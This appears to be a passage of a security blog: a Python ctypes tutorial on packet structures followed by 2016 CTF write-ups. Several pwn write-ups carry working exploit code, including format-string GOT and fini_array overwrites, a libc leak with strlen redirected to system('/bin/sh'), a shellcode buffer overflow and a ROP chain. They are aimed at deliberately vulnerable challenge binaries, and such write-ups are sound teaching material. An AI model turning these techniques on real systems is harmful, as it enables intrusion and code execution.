    uint8_t val2;
} NestedStruct;

typedef struct __attribute__((packed)) ExampleNetworkPacket_ {
    uint16_t version;
    uint16_t reserved;
    uint32_t sanity;
    NestedStruct ns;
    uint32_t datalen;
    unsigned char data[0];
} ExampleNetworkPacket;

The total size of the ExampleNetworkPacket structure will be 17 bytes plus any data appended on it.

As a side note I just recently learned that the last element of the ExampleNetworkPacket is valid C and is useful to be a pointer to the end of the structure instead of having to do this:

unsigned char data = (unsigned char*)(examplenetworkpacketptr + sizeof(ExampleNetworkPacket));

Neat.
[[more]]

Moving on, let's say that you had reverse engineered this program and figured out these structures and named their fields. You set out to build a way to take raw data from a socket and get the fields of these structures. If you were using struct's pack and unpack methods you would do something like this:

version, reserved, sanity, flags, val1, val2, datalen = unpack(">HHL3sccL", recvbuf)
data = recvbuf[16:]

This isn't too bad, actually. The more annoying part is putting one of these things back together...

version, reserved, sanity, flags, val1, val2, datalen = 1, 0, 0x69696969, 1, 2, 3, len(data)
sendbuf = pack(">HHL3sccL", version, reserved, sanity, flags, val1, val2, datalen) + data

Still not too long but it's not clean and you can't easily have different instances like you can with real structs in C.

Python's ctypes module can help you here. It has LittleEndianStructure and BigEndianStructure classes that will help turn the above code into something more usable and readable. BigEndianStructure is particularly useful for network protocols such as the one in the example.

Basic Structures

To get started import ctypes and make a class that inherits the BigEndianStructure. You'll want to import everything from the ctypes module to save you some typing.

from ctypes import *
class MyFirstStructure(BigEndianStructure):
    _pack_ = 1
    _fields_ = [ ('intfield', c_int),
                 ('bytefield', c_ubyte)]

This is a 5 byte structure equivalent to the following C code:

struct __attribute__((packed)) MyFirstStructure {
    int intfield;
    unsigned char bytefield;
};

Note the packed attribute in both snippets. This is important for the following reason:

>>> m = MyFirstStruct()
>>> sizeof(m)
5
>>> class MyFirstStructure(BigEndianStructure):
...    _pack_ = 0
...    _fields_ = [ ('intfield', c_int),
...                 ('bytefield', c_ubyte)]
>>> m = MyFirstStruct()
>>> sizeof(m)
8

The packed structure has a size of 5 while the unpacked structure has a size of 8 because structure elements are always padded out to 4 bytes (on most common architectures) unless packed is specified. Eric Raymond has a great write up on structure packing at his site if you want to know more about that.

Packing becomes important for network protocols because if you have a byte and then an integer (32 bit) it will pad out the byte to 32 bits as well causing your structure type to be off.

Setting attributes of the structure is as easy as just assigning values:

m = MyFirstStruct()
m.intfield = 1072

Getting Raw Bytes and Making Structures from Raw Bytes

I love the book Black Hat Python by Justin Seitz. These particular extensions to the Structure class are based off of some of the code in Black Hat Python. It is talked about here.

We want to define a generic NetStruct class that we can make our structures inherit so they have useful traits:

class NetStruct(BigEndianStructure):
    _pack_ = 1

    def __str__(self):
        return buffer(self)[:]

    def __new__(self, sb=None):
        if sb:
            return self.from_buffer_copy(sb)
        else:
            return BigEndianStructure.__new__(self)

    def __init__(self, sb=None):
        pass

Lets break this down one function at a time:
1. __str__(self) - When we call str() or bytes() on an instance of the structure we want it to return us the raw data from the structure. This makes it easy to send over a socket.
2. __new__(self) - Creates the structure from a raw byte buffer or just makes a blank one.
3. __init__(self) - This is needed to pass the input buffer (sb) to new if one is provided.

With these functions overridden the structure is easier to convert to and from raw bytes.

Building the Protocol

With knowledge of packing in mind lets build our NestedStructure first:

class NestedStruct(NetStruct):
    _fields_ = [('flags', c_ubyte*3),
                ('val1', c_ubyte),
                ('val2', c_ubyte)]

The feature of note here is that you can create arrays by just multiplying the type by the number of elements you need.
This one was fairly simple. Now for the ExampleNetworkPacket structure:

class ExampleNetworkPacket(NetStruct):
    _fields = [('version', c_ushort),
               ('reserved', c _ushort),
               ('sanity', c_uint),
               ('ns', NestedStruct),
               ('datalen', c_uint)]

Two things to note here: first, we can nest structures by simply including another structure as an element and second data is missing! How do we define a field that has a variable length?

Variable length fields

This is sort of where things get tricky. I was searching the internet for a solution to this problem and came across this StackOverflow post.

The code provided actually segfaulted python occasionally... so I ended up just going the simpler route: define the real array as a hidden variable and define the actual data attribute with a getter and setter to modify that array.

class ExampleNetworkPacket(NetStruct):
    _fields_ = [('version', c_ushort),
                ('reserved', c_ushort),
                ('sanity', c_uint),
                ('ns', NestedStruct),
                ('datalen', c_uint)]
    _data = (c_ubyte * 0)()

    @property
    def data(self):
        return str(buffer(self._data))

    @data.setter
    def data(self, indata):
        self.datalen = len(indata)
        self._data = (self._data._type_ * len(indata))()
        memmove(self._data, indata, len(indata))

    def __str__(self):
        return super(self.__class__, self).__str__() + self.data

There is a lot going on here. First, there is an internal data attribute _data that is the actual underlying ctypes array for the data. The @property tag makes it so you can reference data like an attribute (without parentheses). @data.setter defines what to do when you try setting the property attribute (i.e. pkt.data = "boo"). In this case when we access data we want it to return the raw bytes of _data and when we set data we want it to create a new array of the same type but of the new size of the data. We also set the datalen attribute in the setter because it makes things more convenient. Finally, the __str__ function has to be overridden to include the data on the end. Without it you would just get the header.

Testing it Out

>>> enp = ExampleNetworkPacket()
>>> enp.ns.flags[0] = 1
>>> enp.ns.flags[2] = 1
>>> enp.ns.val2 = 0xff
>>> enp.sanity = 0xabcd1234
>>> enp.version = 1
>>> enp.data = "hello world, nice struct"
>>> enp.datalen
24
>>> len(enp.data)
24
>>> enp.data
'hello world, nice struct'
>>> bytes(enp)
'\x00\x01\x00\x00\xab\xcd\x124\x01\x00\x01\x00\xff\x00\x00\x00\x18hello world, nice struct'
>>> enp2 = ExampleNetworkPacket(bytes(enp))
>>> enp.data
'hello world, nice struct'

Now it works exactly as you'd hope. It took a little work but the results are worth it!

Bonus: Bitfields

ctypes also supports bitfields. Lets take the IP header as an example:

class IP(Structure):
    _fields_ = [("ihl", c_ubyte, 4),
        ("version", c_ubyte, 4),
        ("tos", c_ubyte),
        ("len", c_ushort),
        ("id", c_ushort),
        ("offset", c_ushort),
        ("ttl", c_ubyte),
        ("protocol_num", c_ubyte),
        ("sum", c_ushort),
        ("src", c_ulong),
        ("dst", c_ulong)]

Here ihl and version are 4 bits each. The third element in the tuple is how many bits to use if not all of them.
This makes ctypes structures even more powerful.

Python for Hackers

This is getting posted a bit late, but here is a presentation I gave remote for RIT's Competitive Cybersecurity Club Conference (RC4) 2016 on python tricks for hackers. It's a collection of things that I often use within python that make writing functional tools easier.

MMACTF 2016 - Greeting

Challenge description:

Pwn
Host : pwn2.chal.ctf.westerns.tokyo
Port : 16317

Reversing and Finding the Bug

Reversing with radare2:

Looks like another textbook format string vulnerability because the user buffer is put into sprintf and then straight into printf. This time I had to actually do the work of getting code execution because the flag was not loaded onto the stack.

Running the binary

I wanted to see the bug in action so I loaded up my Ubuntu VM using vagrant and checked it out:

β†’ ./greeting
Hello, I'm nao!
Please tell me your name... %08x
Nice to meet you, 080487d0 :)

Neat. Now for exploitation.

Background

For information on printf and a more basic format string exploit, check out the post I did on the judgement pwn challenge also from this CTF. In addition to having positional arguments, printf also has a cool feature where you can write the number of bytes that have been printed so far to a variable. This feature is what makes format string vulnerabilities so dangerous. If you can exploit one, you can get arbitrary write.

Passing %hn to printf in the format string will write up to a half word value of the number of characters written so far. Combining this with positional arguments allows for half a word at a time to be written to anywhere. So this is bad.

If you are interested in learning more about how format string vulnerabilities work then check out this paper

Exploitation

I decided to use libformatstr for this because I have never used it before and it seemed useful so I didn't have to craft the buffer manually.

The payload function takes two arguments: an argument number and a padding number. The offset number is the word distance in memory away from your input and the padding is the number of bytes your input needs to be padded for the addresses you enter to be word aligned. Libformatstr can be used to determine these numbers:

from pwn import *
from libformatstr import *

e = ELF("./greeting")
r = process(e.path)

r.sendline(make_pattern(0x40))
r.recvuntil("you, ")
res = r.recv()
print(res)
argnum, padding = guess_argnum(res, 0x40)
log.info("argnum: {}, padding: {}".format(argnum, padding))

Running this resulted in an output of argnum: 12, padding: 2. There was one other bit that needed to be changed as well. Since "Nice to meet you, " was being prepended to my input I had to set an additional argument when setting up the format string exploit called start_num.

Armed with the argument number, padding, and start number I was ready to try and overwrite some values. The issue I ran into was that there are no function calls after the call to printf in main. I though of trying to overwrite a destructor (dtors), but there were none. I came across a way to overwrite the fini section of a binary to execute a function when the program was supposed to be quitting. I could not find much documentation on exactly what I needed to overwrite to make this work so I just used objdump and grep to find the symbols with fini in the name:

β†’ objdump -t greeting | grep fini
08048780 l    d  .fini  00000000              .fini
08049934 l    d  .fini_array    00000000              .fini_array
08049934 l     O .fini_array    00000000              __do_global_dtors_aux_fini_array_entry
08048740 g     F .text  00000002              __libc_csu_fini
08048780 g     F .fini  00000000              _fini

Five choices. Through trial and error I determined that overwriting whatever was at __do_global_dtors_aux_fini_array_entry gave me control of the program.

My plan of attack became the following:
1. Overwrite __do_global_dtors_aux_fini_array_entry with main
2. Overwrite the GOT entry for strlen with system
3. Write the full format string line into the program
4. When main executes the second time, write /bin/sh so that the call to strlen in the getnline function executes system("/bin/sh") and gives me a shell!

I wrote the following script to do the above:

Running it resulted in the flag :)

β†’ python greet2.py REMOTE
[*] '/home/vagrant/CTF/tokyo/greeting'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE
[x] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317
[x] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317: Trying 40.74.112.206
[+] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317: Done
[+] Wrote system onto strlen and main onto fini... trying shell
[+] got shell
[+] Flag: TWCTF{51mpl3_FSB_r3wr173_4nyw4r3}
[*] Closed connection to pwn2.chal.ctf.westerns.tokyo port 16317

W00t!
TWCTF{51mpl3_FSB_r3wr173_4nyw4r3}

MMACTF 2016 - Judgement

Challenge description:

Pwn Warmup
Host : pwn1.chal.ctf.westerns.tokyo
Port : 31729

This was a binary pwn challenge, so I loaded it up in radare2 to take a look:

Looks like a textbook format string vulnerability. printf has a positional arguments feature so normally you can specify which argument you want to use if you are the programmer. The following is an example use case of this:

printf("3rd argument: %3$08x, 1st argument: %1$c\n", 'a', "unused", 0x41414141);

This will print "3rd argument: 0x41414141, 1st argument: a"

Format string vulnerabilities occur when a user controlled buffer is passed to printf. When printf is called it reads things off of the stack (function arguments) to print. Because the input buffer is passed straight in it allows reads off of the stack.

Since the address of the flag was loaded on the stack before the main function it was somewhere reachable by printfs positional arguments.

I just wrote a loop to brute force the exact offset number and spit out the flag:

β†’ for i in {10..50}; do echo "%$i\$s" | nc pwn1.chal.ctf.westerns.tokyo 31729; done | grep CTF
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}

I got it more than once... but I got it.

TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}

CTFX 2016 - dat-boinary

Reversing the Binary

This challenge provided two binaries: dat-boinary and libc.so.6. Usually this combination requires you to leak memory, calculate offsets, and call system or an exec function from libc. With that in mind I jumped right in to reversing with radare2. The functions are rather large so I will leave this as an exercise to the reader. The binary can be found here.

The first block of main allocates a dynamic buffer of size 0x80 with malloc and gets a "meme id" of up to 9 bytes that is stored in ebp-0x20. The next block provides five menu options: update the meme id, update the meme dankness, update meme content, print meme contents, and the super secret meme option. The first 4 are pretty straight forward, while the last is not so much.

Stack locations of interest are:

  • ebp-0xc - location of menu choice (4 bytes)
  • ebp-0x10 - Temporary storage for the dankness of the meme (4 bytes)
  • ebp-0x14 - malloced buffer for meme content - (4 byte pointer)
  • ebp-0x18 - Meme dankness if the temporary dankness is greater than 0x7f (4 bytes)
  • ebp-0x20 - meme id location (8 bytes)

After some trial and error in gdb I noticed that the initial fgets for the id of the meme takes 9 characters instead of the provided 8. This would prove useful later.

Setting the meme id using the menu option used the length of the preexisting id to know how much to read from the user. This will also be useful, because as long as null bytes in the meme dankness can be avoided then the pointer to the malloced buffer can be overwritten and arbitrary write can be achieved. The only issue here is that this bug can only be triggered once without somehow making strlen return more than the actual strlen of the buffer. Again, that's a task for after investigation.

Setting the dankness involved reading in a number into ebp-0x10 (temporary dankness storage), checking if it was over 0x7f, and then moving it into the meme dankness memory location (ebp-0x18) if that check was false. This is a problem because the meme dankness is directly before the pointer that I wanted to overwrite.

The update content option does exactly what one would expect, but with one additional check: it uses fgets to read into the buffer allocated by malloc. The number of bytes it reads is the dankness number. Before anything is read it checks if the dankness is over 0x80, because that would cause a buffer overflow.

Print contents is also straight forward; it prints the content of the meme with a proper call to printf.

Finally, the secret meme function is passed the meme id buffer and then calls secret_meme. The secret_meme function sets meme id + 8 to 0x69696969 and prints something...

[[more]]

here come dat boi
      ,++++
       ###+.
        #+++
        ++++
      +++++++
   ;+#, ++++'
 ,#`    +++++
        +###'
        +###+'
      +##'#++
      .#:+++#+
      ++  ;  +
       +` ;  +
        +;; ++
       `##;#++
       #:';`+:
      ;'`:;:+;
      #``:;:+#
      # `+;':#
      #: ;'';#
      #.`.;+`:
      ';::;'#
       #.:'#'
        #+#;    o shit whaddup!
sh

it's

a

secret

All I can really say to that is oh shit, whaddup?

Nice. The important thing here is that meme id + 8 is the meme dankness. So before there was no way to set the meme dankness (located right before the content pointer) to something that is 4 bytes in length, eliminating null bytes betweek the meme id and the meme content pointer.

Pointer Overwrite

Loading the binary up in gdb I was able to test this overwrite theory. My plan of attack was:

  1. Set a breakpoint at 0x08048898 to check the stack after each operation.
  2. Set the meme id to a string of length 8 to stop it from writing a null byte into the meme id buffer. It actually goes into the meme dankness, but I control that as well so it does not matter.
  3. Run the secret_meme function to set the dankness to 0x69696969
  4. Run the update id function providing 0xc bytes of junk data and then the pointer (0x41414141 for now)

Success!

Overcoming a null byte

Unfortunately the last byte of the id buffer was set to null and there was no way to unset it. This is where I got clever: what if I could make strlen always return a number high enough to allow the overwrite? Searching ROP gadgets in radare2 turned up one:

0x08048567                 91  xchg eax, ecx
0x08048568               0408  add al, 8
0x0804856a               01c9  add ecx, ecx
0x0804856c               f3c3  ret

To make sure this would be okay I examined the contents of EAX and ECX when strlen is called in main:

eax            0xffffda88       0xffffda88
ecx            0x11             0x11

EAX is a temporary register and will hold the length of the string returned by strlen and ECX just always seems to be 0x11 when this call is made. Furthermore, playing around with the value of ECX for after the function call resulted in no crashes, so this seemed like a good solution.

To cause the overwrite I had to set the pointer (previously set to 0x41414141 above) to the address of got.strlen, change the dankness to 5 to allow 4 bytes of overwrite (fgets accounts for the null), and then write to the address of the meme content.

I decided to use pwntools for this:

e = ELF('./dat-boinary')
r = process(e.path)

strlen_replace = 0x08048567
gdb.attach(r, "b * 0x0804889d")
sleep(3)

r.sendline(cyclic(8))
log.info("buffer maxed out")

r.sendline("5")
log.info("called secret meme")

r.sendline("1")
r.sendline(cyclic(0xc) + p32(e.sym['got.strlen']) + cyclic(10))
log.info("meme content should be addr of strlen")

r.sendline("2")
r.sendline("5")
log.info("set dankness to 5")

r.sendline("3")
r.sendline(p32(strlen_replace))
log.info("strlen replaced")

r.sendline("1")
r.sendline(cyclic(100))

Running this and stepping though each command sent showed that the GOT entry for strlen was overwritten with the address of the gadget:

> x/x &'[email protected]'
0x8049120 <[email protected]>:     0x08048567

Trying to set the meme id again (with cyclic(100)) caused another overwrite:

> x/8x $esp
0xffb136a0:     0xffb13cc9      0x0000002f      0x61616161      0x00616162
0xffb136b0:     0x61616163      0x61616164      0x61616165      0x00000000

So now I was able to write anything anywhere repeatedly.

Leaking Puts

Because ASLR was enabled for this challenge I needed to leak an address of a libc function before I could call system to get a shell. Leaking puts seemed like an obvious choice. This would be done with the help of the print meme content option. All I needed to do was set the meme to the address of puts, print it, and then capture the first four bytes. Those first four bytes would be the ascii representation of the hex address of puts inside of libc. To calculate the offset to system all I had to do was use pwntools to rebase the libc binary and then reference system from the libc binary symbols. All of this is accomplished with the following python snippet:

r.sendline("1")
r.sendline(cyclic(0xc) + p32(e.sym['got.puts']) + cyclic(10))
log.info("meme is now the address of puts")
r.recvrepeat(1)

r.sendline("4")
r.recvuntil("c0nT3nT:")
r.recv(1) #tab
leaked_puts = u32(r.recv(4))

libc.address = leaked_puts - libc.symbols["puts"]
r.recv(1024)
log.success("leaked puts: " + hex(leaked_puts) + ", system: " + hex(libc.symbols['system']))

The resulting output is promising:

[*] meme is now the address of puts
[+] leaked puts: 0xf75a37e0, system: 0xf757e310

Checking this in the debugger confirmed that this was working correctly:

> p system
$1 = {<text variable, no debug info>} 0xf757e310 <system>

I was ready to get the flag!

Flag Captured

Since the meme id was being read in using fread and not fgets I was able to put a null terminated /bin/sh string right at the beginning of the meme id while still being able to set the GOT entry for strlen to the leaked system address. I chose strlen here because it is run on command and has the meme id buffer as its only argument. I followed the following steps to make this work:

  1. Set the meme id to [/bin/sh\x00][0xc-8 bytes junk][address of strlen GOT entry][10 bytes extra to satisfy the read]
  2. Set the meme dankness back to 5 in order to overwrite the meme content
  3. Overwrite the strlen GOT entry with the leaked and calculated system address
  4. Set the meme id to trigger system instead of strlen with /bin/sh in the buffer passed as an argument
  5. Get the flag :)

The full code for the end of this exploit can be seen at the bottom of this post. Running the script on the remote host resulted in the flag!

β†’ python boinary.py REMOTE
[*] '/home/vagrant/CTF/ctfx/dat-boinary'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[*] '/home/vagrant/CTF/ctfx/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to problems.ctfx.io on port 1337: Done
[*] buffer maxed out
[*] called secret meme
[*] meme content should be addr of strlen
[*] set dankness to 5
[*] strlen replaced
[*] meme is now the address of puts
[+] leaked puts: 0xf75f4da0, system: 0xf75ce3e0
[*] set meme to strlen
[*] set dankness to 5
[*] set strlen to system
[*] trying shell
[+] got shell
[+] Flag: ctf(0n1y_th3_fr35h35t_m3m3s)

Gottem: ctf(0n1y_th3_fr35h35t_m3m3s)

Full script

IceCTF 2016 - So Close

Challenge description

Yet so far :( /home/so_close on the shell.

Jumping right in I checked the binary's security with checksec and loaded it up in radare2: No NX and a call to read over stack data... sounds like a simple stack based buffer overflow. [[more]]

The buffer that is read into is of size 0x118 - 0x10 = 264 bytes. Since I'm lazy I used strace to figure out the number of bytes it was reading:

β†’ strace ./so_close 1000
execve("./so_close", ["./so_close", "1000"], [/* 29 vars */]) = 0
[ Process PID=20494 runs in 32 bit mode. ]
brk(0)                                  = 0x93a6000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7746000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50645, ...}) = 0
mmap2(NULL, 50645, PROT_READ, MAP_PRIVATE, 3, 0) = 0xfffffffff7739000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\234\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1754876, ...}) = 0
mmap2(NULL, 1763964, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xfffffffff758a000
mprotect(0xf7732000, 4096, PROT_NONE)   = 0
mmap2(0xf7733000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a8000) = 0xfffffffff7733000
mmap2(0xf7736000, 10876, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7736000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7589000
set_thread_area(0xffe6f130)             = 0
mprotect(0xf7733000, 8192, PROT_READ)   = 0
mprotect(0xf7769000, 4096, PROT_READ)   = 0
munmap(0xf7739000, 50645)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 7), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7745000
write(1, "something something something..\n", 32something something something..
) = 32
read(0, "", 272)                        = 0
exit_group(0)                           = ?
+++ exited with 0 +++

Looks like 272 bytes. So 272 over a 264 byte buffer means a 12 byte overflow. That doesn't sound like a lot, so I loaded up ing gdb and passed in a cyclic pattern:

So I control EIP and what ESP points to, which are one right after the other in the buffer. Looking at the contents of ECX shows that it is the start of the input buffer. If there was some way to jump to ECX then I could execute shellcode, since NX was disabled. After a bit of tinkering, my solution ended up being to find a jmp esp, and assemble jmp ecx where ESP was pointing. I assumed ASLR was enabled, but it should not matter in this case.

The steps I needed to take are as follows:

  1. Find a jmp esp in the binary
  2. Assemble jmp ecx and figure out it's length so I know how to craft the exploit buffer
  3. Craft an exploit buffer
  4. ????
  5. Profit :)

To find a jmp esp all I needed to do was use the assembly opcode search feature of radare2:

/c jmp esp
0x0804859f   # 2: jmp esp

Score. Next, assembling jmp ecx was done with the asm function of pwntools:

python -c 'from pwn import *;len(asm("jmp ecx"))'
2

Then, crafting an exploit buffer... I needed the buffer to look something like this:

[shellcode][asm(jmp ecx)*2][jmp esp][asm(jmp ecx)*2][jmp esp][asm(jmp ecx)*2][jmp esp]...

[asm(jmp ecx)*2][jmp esp] would need to repeat until the end of the buffer to cause the overflow to happen. With this in mind I began to experiment in gdb to eventually get a shell:

A little recap of what happened in that last video:

  • The length of the shellcode generated by pwntools was 22 bytes
  • The total buffer length needed to be 268 to overflow properly
  • 268-22 is the needed length minus the shellcode length
  • ("iiii" + "jjjj") was multiplied by ((268-22)/8) because of the length required after shellcode and because it was 8 bytes long. However, extra padding (the "aaaaaa") needed to be added because 268-22 is 246, which when divided by 8 is 30R6. That remainder needs to be fulfilled in order to make the buffer long enough to trigger the bug
  • "iiii" was replaced with asm("jmp ecx")*2 because it was the contents of where esp was pointing. It was multiplied by 2 to fit our test with "iiii" and "jjjj" because it is two bytes in length when assembled (*2 is the 4 bytes needed).
  • "jjjj" was replaced with 0x0804859f because that is the address of jmp esp we found above. "jjjj" was in for our test, so in order to make the program execute the jmp ecx we assembled earlier. We need that jmp esp because esp points to our assembled jmp ecx.
  • Remember that our shellcode is located at the beginning of the buffer, and ecx points to the beginning of the buffer. So jumping to ecx executes the shellcode.
  • ;cat was added to the end of the python command to keep stdin open. This is a common trick for exploitation problems. check here for a bit of detail

Running this on the binary on the server gave the following:

(python -c 'from pwn import *; print asm(shellcraft.i386.linux.sh()) + (asm("jmp ecx")*2 + p32(0x0804859f))*((268-22)/8) + "aaaaaa"'; cat) | /home/so_close/so_close
something something something..
cat /home/so_close/flag.txt
IceCTF{eeeeeeee_bbbbbbbbb_pppppppp_woooooo}

Flag: IceCTF{eeeeeeee_bbbbbbbbb_pppppppp_woooooo}

IceCTF 2016 - ROPi

Challenge description:

Ritorno orientata programmazione nc ropi.vuln.icec.tf 6500

The binary provided with the challenge was an x86 ELF. I started by reversing it with radare2: Feel free to stop the video above to look at the functions! The main function just calls ezy, which reads 0x40 bytes on top of a buffer that is 0x28 bytes in size. This means that we are running 0x18 bytes over the buffer. The first 4 bytes after those 0x28 overwrite the saved EBP and then the next 4 overwrite EIP. To test this theory we load up the binary in gdb and put in 0x28 bytes, plus BBBB to overwrite EBP, then iiii to overwrite EIP:

[[more]]

Ok so we have program control. Nice! Now what? Since the program is called ROPi I started looking for things to jump to. I actually spent a lot of time trying to find gadgets to write an actual ROP chain. I was stumped for a bit and asked Chris Eagle for some advice because he had solved the challenge for Samurai earlier in the week. He pointed out that there are uncalled functions. If you look in the r2 video above, you can see there are three functions right after ezy in the function list (afl): ret, ori, and pro. After disassembling and reversing them it was clear what the intended solution was: The ret (0x8048569) function calls open("./flag.txt", 0), the ori (0x80485c4) function calls read(dati, 0x80, fd) where fd is the file descriptor opened by open previously and dati is the buffer to read to, and pro (0x804862c) calls printf("%s", dati). So the proper solution is to use return oriented programming to call all of these functions in order. There is one trick, however. If you look closely at ret and ori you will see that there is a condition that needs to be met in order for the functions to not hard exit. For ret, ebp-8 must be 0xbadbeeef and for ori, either ebp-8 must equal 0xabcdefff or ebp-0xc must equal 0x78563412. To start I just tried calling ret then ori so I needed to set up my buffer as follows:

[0x2c bytes padding][address of ret][address of ori][0xbadbeeef][0xabcdefff]

My attempt in gdb: It looks like ret and ori were successfully called! Since this will call ret, then ori, there is no place to put the address of pro to call because of the condition that needs to be meet in ret (0xbadbeeef). To solve this, I can actually re-use the ezy function to read in the buffer again. With this in mind I tried setting up my buffer as follows:

[0x2c bytes padding][address of ret][address of ezy][0xbadbeef][newline][cyclic(100)]

The reason for the cyclic pattern is to figure out at what offset I needed to overflow in ezy the second time in order to regain EIP control. This is shown below:

Looks like I need to write 51 bytes after calling ezy again and then I can overwrite the return. So the final buffer should look as follows:

[0x2c bytes padding][address of ret][address of ezy][0xbadbeeef][newline][51 bytes of padding][address of ori][address of ezy][0xabcdefff][newline][51 bytes of padding][address of pro]

I wrote a quick pwntools script to do just this:

from pwn import *
context.log_level = 'error'
e = ELF("./ropi")

print(cyclic(0x2c) + p32(e.symbols['ret']) + p32(e.symbols['ezy']) + p32(0xbadbeeef))
print(cyclic(51) + p32(e.symbols['ori']) + p32(e.symbols['ezy']) + p32(0xabcdefff))
print(cyclic(51) + p32(e.symbols['pro']))
python ropi.py | nc ropi.vuln.icec.tf 6500
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] aperto
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] leggi
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] stampare
IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}

Flag obtained: IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}

IceCTF 2016 - Blue Monday

Challenge Description:

Those who came before me lived through their vocations From the past until completion, they'll turn away no more And still I find it so hard to say what I need to say But I'm quite sure that you'll tell me just how I should feel today. A file download was given for this challenge. Running file yielded the following result:

β†’ file blue_monday.mid
blue_monday.mid: Standard MIDI data (format 1) using 1 track at 1/220

Assuming it actually was MIDI, I opened it up in audacity with no luck. It was just a bunch of constant tones. This was at about 2:30AM so as a last effort before bed I just catted the file:

β†’ cat blue_monday.mid
MThdTrkId\Icd\ced\eCd\CTd\TFd\F{d\{Hd\HAd\Acd\ckd\k1d\1nd\n9d\9_d\_md\mUd\U5d\5Id\Icd\c_d\_Wd\W1d\17d\7hd\h_d\_md\mId\IDd\D1d\15d\5_d\_Ld\L3d\3td\t5d\5_d\_Hd\H4d\4vd\vEd\E_d\_ad\a_d\_rd\r4d\4vd\v3d\3}d\}h/

The point of interest here for me was that it looked like the beginning was spelling IceCTF{ but with extra characters in between. I loaded it up into ipython and ended up with this snippet to solve it:

with open("blue_monday") as f:
   Β print(''.join([i for i in f.read() if ord(i)<127 and ord(i)>0x10 and i!='\\' and i !='d'])[7:][:-2][::2])

Basically this just removes any character that is non-ascii, a backslash, or d, and then cuts off the first 7 characters (the header) and the last 2, and then takes every other character. They had just embedded the flag into a working MIDI file it seems. Anyway, when you run this it prints the flag: IceCTF{HAck1n9_mU5Ic_W17h_mID15_L3t5_H4vE_a_r4v3}

IceCTF 2016 - Thor is a hacker now

Challenge description:

Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

The text file provided is just a hexdump produced with xxd. xxd actually has a feature to reverse a hexdump back into the original file, from there I identified the resulting file's format with the file command. It was an lzip. Extracting the lzip resulted in the following image:

thor

Flag:

IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

Commands that were run in order:

β†’ xxd -r thor.txt > thor.bin
β†’ file thor.bin
thor.bin: lzip compressed data, version: 1
lzip -d thor.bin
β†’ file thor.bin.out
thor.bin.out: JPEG image data, JFIF standard 1.01
β†’ mv thor.bin.out thor.jpg

IceCTF 2016 - A Strong Feeling

Challenge description:

Do you think you could defeat this password checker for us? It's making me real pissed off! /home/a_strong_feeling/ on the shell or download it here

I started by loading the bin into radare2 and once I realized how big the main function was I just tried running it with input.

It looks like the sentence returned is different the more characters we get right and the same if we get the same number wrong. I had the idea to write a python script with pwntools that ran the binary over and over until a different sentence was produced:

from pwn import *
import string
charset = string.ascii_letters + string.digits + "{}_#"
context.log_level = 'error'

flag = "I"
b = ELF("./strong_feeling")

p = process(b.path)
p.sendline(flag)
out = p.recvall()

while flag[-1] != '}':
    for c in charset:
        p = process(b.path)
        p.sendline(flag+c)
        newout = p.recvall()
        if newout != out:
            out = newout
            flag += c
            print flag
            continue

The results were quite satisfying:

Flag acquired

IceCTF{pip_install_angr}

And yes I realize now that this could have just been solved with angr, but this was a cool way to do it too!

IceCTF 2016 - Corrupt Transmission

Challenge description:

We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it?

For this challenge a file with the extension .png was provided. A common CTF challenge is to corrupt some part of an image, so the solution is to fix it! I started with the header. According to Wikipedia the file header is supposed to start with 89 50 4E 47 0D 0A 1A 0A. Looking at the file using xxd we can see that this png does not start with those bytes:

β†’ xxd corrupt_orig.png | head -1
00000000: 9050 4e47 0e1a 0a1b 0000 000d 4948 4452  .PNG........IHDR

The first byte and bytes 5-8 are wrong. To fix, I opened the image up in hexedit and changed the bytes to their correct values. Opening the file provided a valid image:

flag

